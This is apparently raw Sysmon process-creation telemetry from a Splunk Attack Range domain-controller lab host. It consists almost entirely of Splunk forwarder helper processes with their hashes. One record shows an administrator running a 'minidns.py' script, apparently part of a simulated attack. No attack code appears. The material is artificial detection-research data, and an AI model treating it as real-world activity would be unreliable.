AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040257Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:49:51.377{A8622C2F-528F-6078-7A07-00000000AE01}2272C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exepython minidns.pyC:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000040195Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:49:22.912{A8622C2F-5272-6078-7907-00000000AE01}6656C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040180Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:49:21.238{A8622C2F-5271-6078-7807-00000000AE01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry 
monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040171Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:49:20.572{A8622C2F-5270-6078-7707-00000000AE01}4416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040161Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:49:19.890{A8622C2F-526F-6078-7607-00000000AE01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000040149Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:49:18.004{A8622C2F-526E-6078-7507-00000000AE01}5628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040140Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:49:17.327{A8622C2F-526D-6078-7407-00000000AE01}2952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040131Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:49:16.671{A8622C2F-526C-6078-7307-00000000AE01}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000040011Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:48:22.901{A8622C2F-5236-6078-7207-00000000AE01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039996Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:48:21.217{A8622C2F-5235-6078-7107-00000000AE01}1796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039986Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:48:20.552{A8622C2F-5234-6078-7007-00000000AE01}3648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039977Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:48:19.873{A8622C2F-5233-6078-6F07-00000000AE01}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039956Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:48:17.902{A8622C2F-5231-6078-6E07-00000000AE01}7016C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039947Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:48:17.339{A8622C2F-5231-6078-6D07-00000000AE01}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039937Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:48:16.657{A8622C2F-5230-6078-6C07-00000000AE01}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000039843Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:47:22.992{A8622C2F-51FA-6078-6B07-00000000AE01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039827Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:47:21.205{A8622C2F-51F9-6078-6A07-00000000AE01}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039818Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:47:20.538{A8622C2F-51F8-6078-6907-00000000AE01}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039808Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:47:19.858{A8622C2F-51F7-6078-6807-00000000AE01}7016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039797Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:47:17.987{A8622C2F-51F5-6078-6707-00000000AE01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039788Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:47:17.320{A8622C2F-51F5-6078-6607-00000000AE01}3200C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039779Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:47:16.638{A8622C2F-51F4-6078-6507-00000000AE01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039669Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:46:22.993{A8622C2F-51BE-6078-6407-00000000AE01}6028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039655Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:46:21.211{A8622C2F-51BD-6078-6307-00000000AE01}1292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039645Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:46:20.544{A8622C2F-51BC-6078-6207-00000000AE01}616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039635Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:46:19.869{A8622C2F-51BB-6078-6107-00000000AE01}2508C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039625Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:46:18.030{A8622C2F-51BA-6078-6007-00000000AE01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039615Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:46:17.365{A8622C2F-51B9-6078-5F07-00000000AE01}2576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039605Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:46:16.686{A8622C2F-51B8-6078-5E07-00000000AE01}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039531Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:45:22.985{A8622C2F-5182-6078-5D07-00000000AE01}3176C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000039516Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:45:21.093{A8622C2F-5181-6078-5C07-00000000AE01}3008C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039506Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:45:20.519{A8622C2F-5180-6078-5B07-00000000AE01}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000039497Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:45:19.852{A8622C2F-517F-6078-5A07-00000000AE01}6588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
